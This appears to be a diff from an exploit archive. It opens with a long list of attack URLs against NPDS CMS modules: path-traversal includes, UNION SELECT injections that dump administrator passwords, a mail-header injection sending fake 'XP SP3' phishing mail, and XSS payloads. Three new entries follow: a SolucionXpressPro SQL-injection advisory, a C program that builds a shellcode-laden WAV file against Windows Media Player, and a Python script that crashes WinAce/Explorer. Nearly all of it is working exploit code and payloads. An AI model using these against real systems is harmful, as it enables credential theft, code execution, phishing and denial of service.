http:/www.example.com/npds/modules/td-glossaire/glossaire.php?language=../../../../../logs/security.log%00
/npds/modules/td-glossaire/glossaire.php
Include
http:/www.example.com/npds/modules/td-livredor/admin/livradmin.php?language=../../../../../../../logs/security.log%00
/npds/modules/td-livredor/admin/livradmin.php
Include
http:/www.example.com/npds/modules/td-livredor/envoi.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/envoi.php?language=..
/../../../logs/security.log%00
/npds/modules/td-livredor/envoi.php
Include
http:/www.example.com/npds/modules/td-livredor/error.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/error.php?language=..
/../../../logs/security.log%00
/npds/modules/td-livredor/error.php
Include
http:/www.example.com/npds/modules/td-livredor/error.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/error.php?language=..
/../../../logs/security.log%00
/npds/modules/td-livredor/error.php
Include
http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../../logs/security.log%00
/npds/modules/td-livredor/livre.php
Include
http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../../logs/security.log%00
/npds/modules/td-livredor/livre.php
Include
http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../logs/security.log%00
/npds/modules/td-livredor/livre.php
Include
http:/www.example.com/npds/modules/TvGuide/index.php?ModPath=../../../logs/security.log%00
http:/www.example.com/npds/modules/TvGuide/index.php?language=../../../logs/security.log%00
/npds/modules/TvGuide/index.php
Include
http:/www.example.com/npds/modules/G-annonces/modif_ann.php?ModPath=../../../index.php%00&op=modifier&HTTP_POST_VARS[code]=60000&id=1&table_annonces=annonces&
HTTP_POST_VARS[tel]=Owned%20!!
/npds/modules/G-annonces/modif_ann.php
Modify all comment without login/password
http:/www.example.com/npds/friend.php?op=SendSite&yname=bill%20gates%20<ex_pdg@microsoft.com>%0ATo:victime@poor.fr%0ASubject%20:%20XP%20SP%203%0A%0ADownload%2
0last%20SP%203%20for%20Win%20XP%20in%20www.fakewebsite.com%0A&ymail=ex_pdg@microsoft.com&fname=jfl%0A&fmail=victim2@poor.net
/npds/friend.php
Send fake mail, spam
http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&ble_annonces=`users`/*
/npds/modules/G-annonces/index.php
SQL Inject
http:/www.example.com/npds/modules/G-annonces/list_ann.php?ModPath=../../../index.php%00&table_annonces=annonces%20UNION%20SELECT%200,0,0,CONCAT(aid,char(58),
name,char(58),url,char(58),email,char(58),pwd,char(58)),0,0,0,0,0%20FROM%20authors/*
/npds/modules/G-annonces/list_ann.php
SQL Inject
http:/www.example.com/npds/modules/G-annonces/search.php?ModPath=../../../index.php%00&HTTP_POST_VARS[action]=ajouter&table_annonces=annonces%20UNION%20SELECT
%200,0,CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char
(58)),0,0,0,0,0%20FROM%20authors/*
/npds/modules/G-annonces/search.php
SQL Inject
http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&table_cat=annonces_cat%20UNION%20SELECT%20CONCAT(aid,char(58),name,char(
58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58))%20FROM%20authors/*&table_annonc
es=`annonces`http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&table_cat=faqcategories%20UNION%20SELECT%20CONCAT(aid,char(5
8),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58))%20FROM%20authors/*
&table_annonces=`annonces` WHERE `date`<1/*
/npds/modules/G-annonces/index.php
SQL Inject
ECT%200,0,CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,c
har(58)),0,0,0,0,0%20FROM%20authors/*
/npds/modules/G-annonces/modif_ann.php
SQL Inject
http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?ModPath=../../../../mainfile.php%00&id_user=1&table_annonces=annonces%20UNION%20SELECT%20CONCA
T(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name
,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(
58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),
pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd)%20FROM%20autho
rs/*
/npds/modules/G-annonces/admin/adm_ann.php
SQL Inject & Include
http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?ModPath=../../../../../../npds/index.php%00&HTTP_POST_VARS[action]=ajouter&HTTP_POST_VARS[tabl
e_cat]=%20`users_status`%20(%20`posts`%20,%20`attachsig`%20,%20`rank`%20,%20`level`%20,%20`open`)%20VALUES%20(1,%200,%200,%202,%201)/* OU RECUP DE MOT DE
PASSE ROOT
http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?ModPath=../../../../mainfile.php%00&HTTP_POST_VARS[action]=ajouter&HTTP_POST_VARS[table_cat]=fa
qcategories%20UNION%20SELECT%20CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58)
,email,char(58),pwd,char(58))%20FROM%20authors/*
/npds/modules/G-annonces/admin/adm_cat.php
SQL Inject & Include
http:/www.example.com/npds/modules/G-annonces/admin/?ModPath=../../../../../../npds/index.php%00&table_cat=`test_hack_npds`%20(%20id_cat%20mediumint(11)%20NOT
%20NULL%20auto_increment,%20categorie%20int(3)%20NOT%20NULL%20default%201,%20KEY%20id%20(id_cat))/*
/npds/modules/G-annonces/admin/index.php
SQL Inject & Include
http:/www.example.com/npds/modules/G-annonces/annonce_form.php?ModPath=../../../logs/security.log%00
/npds/modules/G-annonces/annonce_form.php
SQL Inject & Include
XSS non permanent
/npds/modules/annonces/affi_ann.php
XSS
XSS non permanent
/npds/modules/annonces/affiche.php
XSS
http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?mess_acc=%3Cscript>alert("test");%3C/script>
/npds/modules/G-annonces/admin/adm_ann.php
XSS
http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?mess_acc=%3Cscript>alert("test");%3C/script>
/npds/modules/G-annonces/admin/adm_cat.php
XSS
http:/www.example.com/npds/modules/G-annonces/annonce_form.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/npds/modules/G-annonces/annonce_form.php
XSS
http:/www.example.com/npds/modules/G-annonces/index.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/npds/modules/G-annonces/index.php
XSS
http:/www.example.com/npds/modules/G-annonces/list_ann.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/npds/modules/G-annonces/list_ann.php
XSS
http:/www.example.com/npds/modules/G-annonces/modif_ann.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/npds/modules/G-annonces/modif_ann.php
XSS
http:/www.example.com/npds/modules/G-annonces/search.php?mess_acc=%3Cscript>alert(&#039;test&#039;);</script>
/npds/modules/G-annonces/search.php
XSS
http:/www.example.com/npds/modules/G-annonces/admin/index.php?mess_acc=%3Cscript>alert("test");%3C/script>
/npds/modules/GS-annonces/admin/index.php
XSS
http:/www.example.com/npds/modules/Top10/top10.php?bgcolor2=green"><script>alert(&#039;test&#039;);</script>
/npds/modules/Top10/top10.php
XSS
http:/www.example.com/npds/themes/npds2004/footer.php?theme="><script>alert(&#039;test&#039;);</script>
/npds/themes/npds2004/footer.php
XSS

7
platforms/php/webapps/32698.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33111/info
SolucionXpressPro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/main.php?id_area=[SQL]

51
platforms/windows/remote/32684.c Executable file
View file

@ -0,0 +1,51 @@
source: http://www.securityfocus.com/bid/33042/info
Microsoft Windows Media Player is prone to a code-execution vulnerability.
An attacker can exploit this issue by tricking an unsuspecting victim into opening a malicious file with the vulnerable application. A successful exploit will allow arbitrary code to run in the context of the user running the application.
#include <stdio.h>
int main()
{
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=138 Encoder=None http://metasploit.com */
unsigned char scode[] =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99"
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04"
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30"
"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09"
"\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8"
"\x83\xc0\x7b\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff"
"\xe7\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
unsigned char begincode[] =
"\x52\x49\x46\x46\x04\x44\x0E\x01\x57\x41\x56\x45\x66\x6D\x74\x20"
"\x28\x00\x00\x00\xFE\xFF\x02\x00\x00\xEE\x02\x00\x00\x94\x11\x00"
"\x06\x00\x18\x00\x16\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x10\x00\x80\x00\x00\xAA\x00\x38\x9B\x71\x64\x61\x74\x61"
"\xC8\x43\x0E\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00";
FILE *f;
f = _fsopen("new.wav", "w+", 0);
fwrite(begincode, sizeof(scode), 1, f);
for (int i=0; i<20000; i++)
fwrite(scode, sizeof(scode), 1, f);
fclose(f);
return 0;
}

66
platforms/windows/remote/32688.py Executable file
View file

@ -0,0 +1,66 @@
source: http://www.securityfocus.com/bid/33049/info
Winace is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to crash Windows Explorer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Winace 2.2 is vulnerable; other versions may also be affected.
#!/usr/bin/python
#####################################
# Author :
cN4phux
#
# Mail : cN4phux[at]Gmail[dot]com # Proud to be Algerian; #
# Site : N/A (not
yet) #
#####################################
#Greetz to all DZ's : Blub , Knuthy , His0k4 , Djug , Izem , etc . . .
# : Zigma , Heurs etc . . .
# MS Windows Explorer Unspecified ( WinAce 2.2 ) Denial of Service Exploit
# Magic offset :
# Bug comes from shell32.dll
# EventType : BEX P1 : explorer.exe P2 : 6.0.2900.2180 P3
: 41107ece
# P4 : shell32.dll P5 : 6.0.2900.2180 P6 : 4125330f P7 :
000e1666
# P8 : c0000409 P9 : 00000000
# Just right click the file and move your mouse to( Add to
"AAAAAAAAAAAAAAAAAAAAAAAA. . . .ace" ) with WinAce and you'll see ur
Explorer crashes .
# Successfully tested on Windows XP SP2 FR,
import sys
txt_header = ((("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41"))); #
txt_title = "\x41"*194 #
ext = ".txt";
headers = open(txt_title + ext, "w")
headers.write(txt_header)
headers.close()
print "\nFile created successfully !";
print "\n\cN4phux.";